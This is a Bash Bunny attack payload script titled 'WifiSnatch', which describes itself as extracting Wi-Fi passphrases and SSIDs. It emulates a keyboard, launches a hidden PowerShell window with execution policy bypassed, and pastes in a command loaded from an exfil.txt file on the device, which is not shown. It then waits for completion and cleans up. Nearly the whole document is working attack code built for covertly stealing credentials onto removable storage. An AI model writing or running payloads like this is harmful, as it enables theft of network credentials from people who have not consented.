#!/bin/bash
#
# Title:         WifiSnatch
# Description:   Extract wifi information, such as passphrases & SSIDs
# Author:        0i41E
# Version:       1.1
# Category:      Exfiltration
# Attackmodes:   HID, Storage

LED SETUP

GET SWITCH_POSITION
DUCKY_LANG de

rm /root/udisk/DONE

ATTACKMODE HID STORAGE

#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING

LED STAGE1

Q DELAY 1500
RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
Q DELAY 500
Q ENTER

Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\exfil.txt'))"
Q DELAY 2000
Q ENTER
Q DELAY 1000
Q CONTROL v
Q DELAY 1000
Q ENTER
Q DELAY 1000

LED STAGE2

until  [ -f /root/udisk/DONE ]
	do
	sleep 0.2
done

LED CLEANUP

rm /root/udisk/DONE

Q DELAY 100

sync

Q DELAY 100

LED FINISH

#SAVE TO EJECT
